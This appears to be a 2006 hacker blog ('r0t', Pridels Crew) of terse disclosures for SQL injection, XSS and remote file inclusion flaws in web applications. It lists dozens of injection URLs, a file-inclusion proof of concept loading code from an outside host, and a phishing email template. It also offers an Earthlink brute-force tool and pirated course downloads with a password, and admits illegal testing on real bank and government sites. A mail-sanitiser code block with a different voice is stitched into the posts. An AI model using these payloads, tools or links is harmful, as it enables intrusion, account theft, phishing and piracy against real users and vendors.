PlexCart contains a flaw that allows remote SQL injection attacks. Input passed to the "catid" parameter in "plexcart.pl" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:


/plexcart.pl?section=catalog&page=subcat&where=catalog&catid=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, April 18, 2006

AWStats 6.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendorlink:http://awstats.sourceforge.net
affected versions:AWStats 6.5 (build 1.857) and previous
###############################################


Vuln. Description:


AWStats contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "config" parameter in "awstats.pl" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Also, while performing the XSS check, the attacker gets a full path disclosure.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

xFlow v5.x multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendorlink:http://www.skymarx.com/affiliate_software.html
affected versions:v5.46.11 and previous
###############################################


Product info:

After over five years of development, the xFlow has become an industry leader amongst membership management softwares, and will continue to dominate. With version 6 in development (written in PHP) and our expanding premier business services, the xFlow and Skymarx Solutions will soon be rivaling the largest software providers in the world.
Designed with flexibility in mind, you can easily customize the xFlow to your exact business needs. Packaged with tons of features, the xFlow contains everything you need to successfully start your own membership based business, or manage a large corporation: customizable member database, full genealogy tracking, transaction system, reporting features, powerful Member's Only Area, support for 28+ payment processors, plus much more.

###############################################



Vuln. Description:





1. SQL inj. vuln.

xFlow contains a flaw that allows remote SQL injection attacks. Input passed to the "position" and "id" parameters in "index.cgi" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=view_downline&level=Direct&position=1[SQL]


/members_only/index.cgi?id=[SQL]&username=r0t&seed=TfgNxKhyqEELQQQKizBWyVShdbOpfugMaQhpuGqI




2. XSS vuln.

xFlow contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "level", "position", "id", "action" and "page" parameters in "index.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:


/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=view_downline&level=[XSS]&position=10


/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=view_downline&level=Direct&position=1[XSS]

/members_only/index.cgi?id=[XSS]&username=r0t&seed=TfgNxKhyqEELQQQKizBWyVShdbOpfugMaQhpuGqI

/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=[XSS]&level=&position=10

/customer_area/index.cgi?id=1&username=r0t&seed=pWltDqcPcLuedZnXTwCNWldbpJmQANHFHfFvveFY&page=[XSS]



3. Full Path Disclosure & info

examples:

/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=[CODE]&level=&position=10

/customer_area/index.cgi?id=1&username=r0t&seed=pWltDqcPcLuedZnXTwCNWldbpJmQANHFHfFvveFY&page=[CODE]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Leadhound multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:http://www.leadhoundnetwork.com/
affected versions:
Leadhound "Full Remote version"
&
Leadhound LITE 2.1
###############################################



Product info:


# Secure private network - Leadhound technology is hosted in-house at Leadhound's corporate offices. To help ensure maximum performance, a dedicated high performance 128-bit SSL secured server is included as part of the licensing agreement.
# Full control over your affiliates - Each application can be reviewed for your approval, or rejection based on criteria that you set.
# Reliability - Leadhound was designed from the ground up to be fully scalable, and serve 10,000's of affiliates. Our technology is proven, reliable, and an affordable solution.
# Time to market - Save tens of thousands of Dollars in development cost, and countless hours of programming. Our technology is blended seamlessly into your current design.


###############################################

Vuln. Description:

1. Multiple SQL injection vuln.

Leadhound contains flaws that allow remote SQL injection attacks. Input passed to the "banner", "offset", "sub", "camp_id", "login", "logged" and "agent_id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Notice: to see which parameter is in which file, please look at the examples:


/cgi-bin/agent_links.pl?login=r0t&logged=&camp_id=0&sub=&banner=[SQL]

/cgi-bin/agent_links.pl?login=r0t&logged=&camp_id=0&sub=&banner='0'&move=1&submitted=1&offset=[SQL]

/cgi-bin/agent_transactions_csv.pl?login=r0t&logged=&camp_id=0&sub=[SQL]

/cgi-bin/agent_transactions.pl?login=r0t&logged=&submitted=1&offset=[SQL]

/cgi-bin/agent_transactions.pl?login=r0t&logged=&submitted=1&offset=0&sub=[SQL]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=[SQL]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=0&sub=&camp_id=[SQL]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=0&sub=[SQL]

/cgi-bin/agent_commission_statement.pl?login=[SQL]

/cgi-bin/agent_commission_statement.pl?login=r0t&logged=[SQL]

/cgi-bin/agent_commission_statement.pl?login=r0t&logged=&agent_id=[SQL]

/cgi-bin/agent_summary.pl?login=r0t&logged=&submitted=1&offset=[SQL]

/cgi-bin/agent_camp_det.pl?login=r0t&logged=[SQL]

/cgi-bin/agent_camp_det.pl?login=r0t&logged=&camp_id=[SQL]


xssxssxssxssxssxssxssxssxssxssxssxssxssxssxss


2. Multiple XSS vuln.


Leadhound contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "login", "logged", "camp_id", "banner", "offset", "date", "dates" and "page" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/cgi-bin/agent_affil.pl?login=[XSS]

/cgi-bin/agent_help.pl?login=[XSS]

/cgi-bin/agent_faq.pl?login=[XSS]

/cgi-bin/agent_faq.pl?login=demo&logged=[XSS]

/cgi-bin/agent_help_insert.pl?login=[XSS]

/cgi-bin/agent_help_insert.pl?login=r0t&logged=[XSS]

/cgi-bin/sign_out.pl?login=[XSS]

/cgi-bin/members.pl?login=[XSS]

/cgi-bin/members.pl?login=r0t&logged=[XSS]

/cgi-bin/modify_agent_1.pl?login=[XSS]

/cgi-bin/modify_agent_1.pl?login=r0t&logged=[XSS]

/cgi-bin/modify_agent_2.pl?login=[XSS]

/cgi-bin/modify_agent_2.pl?login=r0t&logged=[XSS]

/cgi-bin/modify_agent.pl?login=[XSS]

/cgi-bin/modify_agent.pl?login=r0t&logged=[XSS]


/cgi-bin/agent_links.pl?login=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logged=&camp_id=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logged=&camp_id=0&sub=&banner=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logged=&camp_id=0&sub=&banner='0'&move=1&submitted=1&offset=[XSS]

/cgi-bin/agent_stats_pending_leads.pl?login=[XSS]

/cgi-bin/agent_logoff.pl?login=[XSS]

/cgi-bin/agent_rev_det.pl?login=[XSS]

/cgi-bin/agent_rev_det.pl?login=r0t&dates=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=0&sub=&camp_id=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=0&sub=&camp_id=0&date=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=r0t&logged=&submitted=1&offset=0&sub=[XSS]

/cgi-bin/agent_commission_statement.pl?login=r0t&logged=&agent_id=[XSS]

/cgi-bin/agent_stats_pending_leads.pl?login=[XSS]

/cgi-bin/agent_stats_pending_leads.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_transactions.pl?login=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t&logged=&submitted=1&offset=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t&logged=&submitted=1&offset=0&sub=&date=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t&logged=&submitted=1&offset=0&sub=[XSS]

/cgi-bin/agent_payment_history.pl?login=[XSS]

/cgi-bin/agent_summary.pl?login=[XSS]

/cgi-bin/agent_summary.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_summary.pl?login=r0t&logged=&submitted=1&offset=[XSS]

/cgi-bin/agent_summary.pl?login=r0t&logged=&submitted=1&offset=0&date=[XSS]

/cgi-bin/agent_camp_all.pl?login=[XSS]

/cgi-bin/agent_camp_all.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_new.pl?login=[XSS]

/cgi-bin/agent_camp_new.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_notsub.pl?login=[XSS]

/cgi-bin/agent_camp_notsub.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_campaign.pl?login=[XSS]

/cgi-bin/agent_campaign.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_expired.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_expired.pl?login=[XSS]


/cgi-bin/agent_stats_det.pl?login=r0t&dates=[XSS]

/cgi-bin/agent_stats_det.pl?login=[XSS]

/cgi-bin/agent_stats.pl?login=[XSS]

/cgi-bin/agent_stats.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_det.pl?login=r0t&logged=&camp_id=2&page=[XSS]

/cgi-bin/agent_camp_det.pl?login=r0t&logged=&camp_id=[XSS]

/cgi-bin/agent_camp_det.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_det.pl?login=[XSS]

/cgi-bin/agent_camp_sub.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_camp_sub.pl?login=[XSS]

/cgi-bin/agent_affil_list.pl?login=r0t&logged=[XSS]

/cgi-bin/agent_affil_list.pl?login=[XSS]

/cgi-bin/agent_affil_code.pl?login=[XSS]

/cgi-bin/agent_affil_code.pl?login=r0t&logged=[XSS]

and

In the lost password field, enter the XSS test string.

/cgi-bin/lost_pwd.pl [XSS]


###############################################
PS. Too many bugs, I'm getting very tired... :)
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ModernBill multiple SQL inj. vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:www.moderngigabyte.com
product link:www.moderngigabyte.net/modernbill/index.htm?ref=home_of_modernbill
affected versions:4.3.2 and previous
###############################################

Vuln. description:


1. SQL injection vuln. with user permissions.

ModernBill contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "user.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/user.php?op=menu&tile=mysupport&type=view&id=1[SQL]

/user.php?op=menu&tile=mysupport&type=details&id=(existing id number)[SQL]

/user.php?op=client_invoice&db_table=client_invoice&tile=myinvoices&print=&id=invoice_id|2869[SQL]

2. SQL injection vuln. with admin permissions.

ModernBill contains a flaw that allows remote SQL injection attacks. Input passed to the "WHERE+todo_status", "where", "order" and "WHERE+call_status" parameters in "admin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/admin.php?op=view&db_table=todo_list&tile=todo&where=WHERE+todo_status=[SQL]

/admin.php?op=view&db_table=todo_list&tile=todo&where=[SQL]

/admin.php?op=view&db_table=todo_list&where=&order=[SQL]

/admin.php?op=view&db_table=support_desk&tile=support_desk_list&where=WHERE+call_status=[SQL]

###############################################
Notice: for successful exploitation (in the second case) the attacker must have "admin" permissions.
Btw, there are many more mistakes/vulns in the admin panel, but as you understand, if an attacker has admin permissions he will not need to exploit those vulns.
Also, it was tested on ModernBill Version 4.3.2:B-2:PR:Z:35, but I think that the 5.0 RC1 version has the same vuln.
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BluePay Manager v2.0 Script Insertion Vulnerability

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:bluepay.com
affected versions:v2.0 and previous
###############################################

Vuln. description:


Input passed to the "Account Name" and "Username" fields when a user tries to log in is not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in the context of an affected site when the malicious user data is viewed.


example:

manual check only:

https://secure.bluepay.com/login

Type some XSS test characters into those fields and you will see.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Article Publisher Pro SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:Scriptsfrenzy.com
product link:http://www.scriptsfrenzy.com/article.html
affected versions: 1.0.1 and previous
###############################################


Vuln. description:

Article Publisher Pro contains a flaw that allows remote SQL injection attacks. Input passed to the "cname" parameter in "category.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:

/category.php?cname=[SQL]



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, April 17, 2006

vuln. on yandex.ru , yahoo.com and others

This vuln. can mostly be used for phishing attacks...
Just look at the screenshot:


In the screenshot you see just my email address, but there can be anything else, like a redirect to the attacker's host.

So, the attacker must only put into the mail HTML body something like in my example:

(?
(TABLE border="1" cellspacing="1" cellpadding="0">
(tr>Please contact administrator (a href=r0t@r00t.it>r0t@r00t.it(/a>
(/table>
(TABLE border="1" cellspacing="1" cellpadding="0">
(tr>Hi victim!(/tr>
(/table>

notice: of course change "(" to "<"


So, it works on yandex.ru, yahoo.com (already reported and will be fixed soon) and many other email services.
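The post above shows the defect from the sender's side: the webmail front end renders whatever HTML arrives in the message body, so a table and an anchor can be dressed up as an administrator notice. The defence on the webmail side is an allowlist sanitiser applied before the body is displayed. The following is an added example and not code from any of the mail providers named; it is written in Python (the providers' own stacks are not on the page), the tag allowlist is a constructed choice, and the sample message and the host "attacker.invalid" are constructed placeholders modelled on the post's example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags a webmail front end might let through; everything else is dropped (its text survives).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "table", "tr", "td", "th"}
DROP_CONTENT = {"script", "style"}        # tag and its contents are removed entirely
LINK_SCHEMES = {"http", "https"}           # hrefs kept only with an explicit web scheme


class MailSanitizer(HTMLParser):
    """Allowlist sanitiser: keeps a few formatting tags with no attributes,
    keeps <a> only with an http(s) href, and records every link target so
    the UI can show the reader where a link really goes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.links = []
        self._skip = 0              # depth inside script/style
        self._anchor_open = False

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._skip += 1
            return
        if tag == "a":
            href = dict(attrs).get("href") or ""
            if urlsplit(href).scheme.lower() in LINK_SCHEMES:
                self.out.append('<a href="%s" rel="noopener noreferrer">' % escape(href, quote=True))
                self.links.append(href)
                self._anchor_open = True
            else:
                self._anchor_open = False   # javascript:, data:, bare addresses: text only
            return
        if tag in ALLOWED_TAGS:
            self.out.append("<%s>" % tag)   # attributes (onclick, style, ...) are discarded

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif tag == "a":
            if self._anchor_open:
                self.out.append("</a>")
                self._anchor_open = False
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=True))


def sanitize_mail_html(body):
    """Return (safe_html, link_targets) for an untrusted HTML mail body."""
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.links


# Constructed message in the shape of the post's example, with a real "<" and an
# attacker-controlled link target ("attacker.invalid" is a placeholder host).
SAMPLE_MAIL = (
    '<table border="1" cellspacing="1" cellpadding="0">'
    '<tr><td onclick="steal()">Please contact administrator '
    '<a href="http://attacker.invalid/login">support@example.com</a></td></tr>'
    '</table>'
    '<script>alert(1)</script>'
    '<a href="javascript:alert(1)">Hi victim!</a>'
)

if __name__ == "__main__":
    safe, links = sanitize_mail_html(SAMPLE_MAIL)
    print(safe)
    print("link targets to display:", links)
```

The returned link list is the part that addresses the phishing angle of the post: a mail client that shows the real target of every link next to its visible text takes away the "Please contact administrator" disguise, whatever tags it allows. A production sanitiser would also want to allow `mailto:` links and a richer tag set, but the structure stays the same: allowlist, drop attributes, escape text.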

Greetings...

This is my first post to the blog (not a very useful one ;P). I have just become one of the lucky contributors to the blog; I will most probably contribute things a little different from the ones that other contributors are posting, since I'm not in the vuln. discovery business, I more like to think of myself as being a coder. Currently I have 101 things to do in both the real and virtual worlds, but since r0t has honored me with an account here, it is my duty to spend some time here, and that's what I'm gonna do. If you want to ask any questions, you can do it in our forums, I will be glad to answer them. I speak English, Latvian and Russian, so you can ask questions in any one of those languages. Ok, peace, I'm off to find something interesting for all of you.

Sunday, April 16, 2006

phpLinks <= 2.1.3.1 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 16 april 2006
vendorlink:http://sourceforge.net/projects/phplinks/
affected versions:phpLinks 2.1.3.1 and previous
###############################################

Vuln. Description:


phpLinks contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "term" parameter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

http://[victim]/phpLinks_path/index.php?logic=or&maximum=&term=%22%3Cscript%3Ealert('r0t')%3C/script%3E


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

@ Earthlink.net bruteforce II

Bruteforce tool for the popular email provider earthlink.net, including all of that service's subdomains


Download

Musicbox vuln.

###############################################
Vuln. discovered by : r0t
Date: 16 april 2006
vendorlink:http://www.musicboxv2.com/
affected versions:2.3.3 and previous
###############################################

Vuln. Description:

1.
Input passed to the "term" parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:

/index.php?in=song&term=%22%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&action=search&start=0

2.
Musicbox contains a flaw that allows remote SQL injection attacks. Input passed to the "start" and "type" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/index.php?in=song&term=r0t&action=search&start=[SQL]
/index.php?action=top&show=10&type=[SQL]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 15, 2006

PhpGuestbook v1.0 Script Insertion Vulnerability

###############################################
Vuln. discovered by : r0t
Date: 15 april 2006
vendor:Dubelu
vendorlink:http://www.dubelu.com/
affected versions:PhpGuestbook v1.0 and previous
###############################################

Vuln. Description:

Input passed to the "Name","Website","Comment" field parameters in "PhpGuestbook.php" is not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, April 12, 2006

TestOut Security+


CD 1
http://rapidshare.de/files/16665116/Security
__SYO-101_Disk_1.part01.TIJNEMA.rar
http://rapidshare.de/files/16666173/Security
__SYO-101_Disk_1.part02.TIJNEMA.rar
http://rapidshare.de/files/16667226/Security
__SYO-101_Disk_1.part03.TIJNEMA.rar
http://rapidshare.de/files/16668278/Security
__SYO-101_Disk_1.part04.TIJNEMA.rar
http://rapidshare.de/files/16669155/Security
__SYO-101_Disk_1.part05.TIJNEMA.rar
http://rapidshare.de/files/16670024/Security
__SYO-101_Disk_1.part06.TIJNEMA.rar
http://rapidshare.de/files/16670178/Security
__SYO-101_Disk_1.part07.TIJNEMA.rar

CD 2
http://rapidshare.de/files/16671066/Security
__SYO-101_Disk_2.part01.TIJNEMA.rar
http://rapidshare.de/files/16671848/Security
__SYO-101_Disk_2.part02.TIJNEMA.rar
http://rapidshare.de/files/16672515/Security
__SYO-101_Disk_2.part03.TIJNEMA.rar
http://rapidshare.de/files/16673161/Security
__SYO-101_Disk_2.part04.TIJNEMA.rar
http://rapidshare.de/files/16870522/Security
__SYO-101_Disk_2.part05.TIJNEMA.rar
http://rapidshare.de/files/16871219/Security
__SYO-101_Disk_2.part06.TIJNEMA.rar

Password:tijnema


Mirror:



CD1:
http://www.megaupload.com/?d=5NN0ESJJ
http://www.megaupload.com/?d=S79XNOPS
http://www.megaupload.com/?d=VCW61J49
http://www.megaupload.com/?d=EHZ78ILM
http://www.megaupload.com/?d=A13NARWK
http://www.megaupload.com/?d=TQSRURQ5
http://www.megaupload.com/?d=9XN0I22K


CD2:

http://www.megaupload.com/?d=UFIBCT6Y
http://www.megaupload.com/?d=25QSV98B
http://www.megaupload.com/?d=UNYW734A
http://www.megaupload.com/?d=F6QA6EE5
http://www.megaupload.com/?d=QS9T32BF
http://www.megaupload.com/?d=RWYWUYBD

Password:tijnema

MonsterTopList

=================================

MonsterTopList- Remote Code Execution bug
By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4
Risk: Moderate
Status: unpatched

=================================

This flaw is due to an input validation error in the "sources/functions.php" script (line 8), which does not validate the "$root_path" variable; remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.

code:file sources/functions.php

line 8: require $root_path . "sources/func_output.php";



demo:

http://www.monstertoplist.com/demo.html



POC Exploit: http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/

Tuesday, April 11, 2006

r0t FAQ edition 0.9 alfa

Hi again,
I'm r0t, who reports mostly about new SQL/XSS attack vulnerabilities on the net.
So there are some things that I want to make clear:

1) You aren't correct with your report.


1. Every one of my vulnerability reports is automatically reported to 4 vuln. research teams/bugtraq sites (secunia, osvdb, frsirt, security.nnov.ru). So, that means either you are more skilled than all of us together or you missed some stuff. 99% of all my reports are later verified by the biggest and best vulnerability researchers in the world.
So I also have mistakes in my reports, because sometimes I report vulns. for software which doesn't have any public demos or trial versions, and my tests are only done on a "case study" or on clients who use that software.
In that way, the vuln. researchers who try to verify my report after me sometimes have big problems with that, because who wants to test on real examples, and of course it's illegal, so you can only imagine what it is like to prove something by doing tests on bank sites and .gov sites.
About that, of course I have problems with governments, police and other structures who fight vs "hackers" at all, but it's my problem, not yours.
Does it mean that I have broken laws with my tests and reports?
Yes, of course, but as I used them only for testing and reporting, I can answer in any court for that, for my tests and reports.




2) Next time report to the vendor!

2. Why don't I report vulnerabilities to vendors? There were a few times when I did report, and one of them was vBulletin, my favorite forum developers; when from a few reports I didn't get answers in some weeks, I automatically forgot about reporting to vendors. Of course not all vendors are like one vendor, and one vendor isn't like the others.




3) It isn't professional when you don't report to vendors.

3. Look, if you are one of those vendors who are listed on my blog, that shows that you made a mistake in your work and your product was unsecured, and that means that you aren't professional; I'm not a developer, I'm only a pentester.




4) Give me a live example.

4. If you aren't from Secunia, frsirt, osvdb or the vendor, I will not provide you with any live examples or HowTos. So anyway, forget about that and RFM!




5) We have fixed that in the new release, delete your report.

5. Look, I'm very glad that you have fixed that vuln., but the vulnerable version of your developed software is already in use and many people will use it for a while.
These are my reports, and nothing will be deleted unless I recognize that it was my mistake.

6) You are a hacker.

6. I never had the idea that I'm a hacker; a hacker for me is a guru with skills and knowledge that I don't have. I only do my "job": I report about unsecured systems, with the wish that not the vendor but the software's potential user will know about unsecured systems, and it will get easier for him to choose which software he will use in his project.
Yes, of course I admit I moderate some hacker and security boards now, but there I am with another "ID", because sometimes being r0t can be very dangerous.

7) Those bugs are tiresome; without you the blog was much better/more interesting.

7. Dear Latvian comrades, to everyone for whom visiting this blog or my presence causes headaches, I can recommend never coming to this blog.
Of course I will agree if you say that this is not a normal blog, etc.
Because I am no blog lover, which you can already judge from the mess that is visible on this blog..
But to say that, look, without you it was much more readable would be completely stupid, because I created the blog.
By the way, the Latvian net doesn't interest me enough for me to reckon with it.



PS.
I hope this FAQ will give answers to most of your questions; if you have any other questions about me or my reports you can mail me: r0t [at] r00t.it

Monday, April 10, 2006

Blog visitors..

Here you see the top 10 countries of this blog's visitors.
1.United States of America
2.United Kingdom
3.Germany
4.Latvia
5.Canada
6.France
7.Italy
8.Turkey
9.Korea
10.Australia

I'm only surprised about Brazil, because a few months ago Brazil was in 2nd place and of course you know why.. but why did they leave us.. interesting :)
I'm sure that with 3 new bugs with file inclusion they are back in second place :)


Google top 10 referring searches:


1.childporn
2.prorat 2.0
3.@mile2.com
4.hackers toolkit 2005
5.openedit
6.wikkawiki architecture
7.sqlpoke usage
8.md4 rainbow tables online
9.prorat 1.9 fix2
10.rwauction pro

"Childporn" has been in 1st place for half a year :)

Top 10 referring sites:

1.google
2.secunia.com
3.rcf.mitre.org
4.frsirt.com
5.security.nnov.ru
6.securityfocus.com
7.blogger.com
8.nvd.nist.gov
9.hackerscenter.com
10.xforce.iss.net

We use Blogger, that's why the page rank by Google is much better than it should be..
If you try keywords like "XSS vuln" or "SQL vuln" you will get this blog, even though we don't speak about security, only about unsecured systems :)

ShopXS v4.0 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:MK Internet-Service GmbH
vendorlink:http://www.shopxs.de/
affected versions:ShopXS-Version 4.00 and previous
###############################################


Vuln. Description:

Input passed to the search module field parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Greetings to: der4444,xaPridel,cembo,g0df4th3r,
waraxe,FrozenEye,str0ke,RaZbh,rst team,nst team,
Minsk,:[PsiHOdelik]:,damrai,UFoloG,verified team,
clanger,Hello_its_me,johnco,Txuri,The Cracker,
mag2000,fredrau,owen and to all X-ACCESS team!
###############################################
More information @ unsecured-systems.com/forum/

interaktiv.shop v.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:http://www.interaktiv.net/
affected versions: V.5 and prior
###############################################


Vuln. Description:


interaktiv.shop contains flaws that allow remote cross site scripting attacks.
Those flaws exist because input passed to the "pn" and "sbeg" parameters in "shop_main.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/cgi-bin/interaktiv.shop/front/shop_main.cgi?func=det&wkid=41587822301246215&rub1=Footprints&rub2=Architect&artnr=114&pn=%22%3Cscript%3Ealert('r0t')%3C/script%3E


/cgi-bin/interaktiv.shop/front/shop_main.cgi?func=searchdo&sfields=&wkid=41587822301246215&rub1_search=all&sfield=1&sbeg=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Greetings to: der4444,xaPridel,cembo,g0df4th3r,
waraxe,FrozenEye,str0ke,RaZbh,rst team,nst team
###############################################
More information @ unsecured-systems.com/forum/

about Pridels Crew...

Hi peepz,
Some words again about the project...
I was missing for 3 months and wasn't here; also I didn't see RaZbh for a while, I hope that he reads this message and will contact me.. But as you see cembo has released his "Alberts", about which you can learn more on our board.
Yeah... board.. board.. it's still running on 3.5.1, but I will upgrade in the next days..
Also I must upgrade our poor site, which uses the same script as Astalavista (weeks ago found an XSS vuln. on it).
I had planned that I would post all new vulns at our site, but most of them are just crap and it's just some minutes' job, so I still post that garbage in this blog, because it's easier and faster.
But I saw that some of the advisories cembo or der4444 had added from here...

About my friend der4444: he was also here all the time, of course not enough time because he studies and works; everybody has limited time for most stuff.
What I want to say is that as a crew we will need new members; of course we don't care about nationality or religion or even political choice, because our world is free from that shit, and if we are addicted then we are addicted to ourselves and the things we like to do..
Ok, for those interested in joining our crew/board/community, just go and register @ the board and show that you're interested in helping the community, or in learning, or just in joining the crew.
Pridels Crew needs:
Coders, Programmers, Xploiters, Pentesters, Designers, Moderators (with experience)

Join the board or mail me: r0t [at] r00t.it

PS.
I saw that some eXploiters/hax0rs ask money for some education stuff or for some VIP features; we will not ask for any money or donations, because we do what we like to do.. And the project is sponsored by ourselves.
We share our skills, our time and that's all!


r0t

Papoo Multiple SQL vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:http://www.papoo.de/
affected versions: 2.1.5 & 3 beta1 and previous
###############################################

Vuln. description:

Papoo contains a flaw that allows remote SQL injection attacks. Input passed to the "getlang" and "reporeid" parameters in "index.php", to the "msgid" and "menuid" parameters in "forumthread.php", and to the "menuid" parameter in "plugin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/index.php?getlang=[SQL]
/plugin.php?menuid=[SQL]
/index.php?menuid=&reporeid=[SQL]
/forumthread.php?forumid=1&menuid=1&rootid=9895&msgid=[SQL]
/forumthread.php?forumid=1&menuid=[SQL]




###############################################

